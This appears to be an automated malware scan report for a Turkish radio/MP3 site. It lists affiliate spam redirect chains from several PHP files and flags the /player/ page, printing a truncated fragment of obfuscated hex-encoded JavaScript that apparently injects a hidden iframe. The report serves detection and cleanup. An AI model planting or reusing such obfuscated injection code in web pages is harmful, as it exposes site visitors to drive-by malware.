Scanned pages/files
Request | Server response | Status |
http://mavinota.radyolar.biz/ | 200 OK Content-Length: 625 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/cgi-bin/ | 403 Forbidden Content-Length: 512 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/test404page.js | 404 Not Found Content-Length: 514 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/images/ | 200 OK Content-Length: 394 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/jxomzqfe/ | 200 OK Content-Length: 398 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/ | 200 OK Content-Length: 930 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/OLGUN%20BAROK14.mp3 | 200 OK Content-Length: 302272 Content-Type: audio/mpeg | clean |
http://mavinota.radyolar.biz/mp3/OLGUN%20BAROK15.mp3 | 200 OK Content-Length: 300824 Content-Type: audio/mpeg | clean |
http://mavinota.radyolar.biz/mp3/OLGUN%20BAROK16.mp3 | 200 OK Content-Length: 303472 Content-Type: audio/mpeg | clean |
http://mavinota.radyolar.biz/mp3/likeit.php | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 11:28:58 GMT Location: http://com-ha68.net/space.php?a=277016&c=wl_con&s=01 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.19 | clean |
http://com-ha68.net/space.php?a=277016&c=wl_con&s=01 | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 10:15:15 GMT Location: http://com-jk44.net/indexer.php?a=277016&c=wl_con&s=01 Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: AFFID=277016; expires=Sun, 11-May-2014 11:30:00 GMT; path=/; domain=.com-ha68.net Set-Cookie: SID=01; expires=Sun, 11-May-2014 11:30:00 GMT; path=/; domain=.com-ha68.net | clean |
http://com-jk44.net/indexer.php?a=277016&c=wl_con&s=01 | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 11:27:36 GMT Location: http://health.com-jk44.net/wl/GarciniaCambogia/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: AFFID=277016; expires=Sun, 11-May-2014 11:30:06 GMT; path=/; domain=.com-jk44.net Set-Cookie: SID=01; expires=Sun, 11-May-2014 11:30:06 GMT; path=/; domain=.com-jk44.net | clean |
http://health.com-jk44.net/wl/garciniacambogia/ | 404 Not Found Content-Length: 303 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/pinterest.php | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 11:29:03 GMT Location: http://com-ha68.net/space.php?a=277016&c=wl_con&s=01 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.19 | clean |
http://mavinota.radyolar.biz/mp3/prc_dev_cnfg.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/prc_xml_cnfg.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/prc_xml_dev.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://mavinota.radyolar.biz/mp3/twit.php | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 11:29:04 GMT Location: http://com-ha68.net/space.php?a=277016&c=wl_con&s=01 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.19 | clean |
http://mavinota.radyolar.biz/mp3/vimeo.php | HTTP/1.1 302 Found Connection: close Date: Fri, 11 Apr 2014 11:29:06 GMT Location: http://com-ha68.net/space.php?a=277016&c=wl_con&s=01 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.19 | clean |
http://mavinota.radyolar.biz/player/ | 200 OK Content-Length: 13057 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6b:6b:6c:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6b:6b:6c:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6b Antivirus reports:
| ||
http://mavinota.radyolar.biz/player/template/flashobject.js | 404 Not Found Content-Length: 530 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mavinota.radyolar.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 11:28:53 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 625
Content-Type: text/html;charset=ISO-8859-1
...625 bytes of data.
GET / HTTP/1.1
Host: mavinota.radyolar.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 11:28:53 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 625
Content-Type: text/html;charset=ISO-8859-1
...625 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mavinota.radyolar.biz
Referer: http://www.google.com/search?q=mavinota.radyolar.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mavinota.radyolar.biz
Referer: http://www.google.com/search?q=mavinota.radyolar.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mavinota.radyolar.biz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mavinota.radyolar.biz/
Result: mavinota.radyolar.biz is not infected or malware details are not published yet.
Result: mavinota.radyolar.biz is not infected or malware details are not published yet.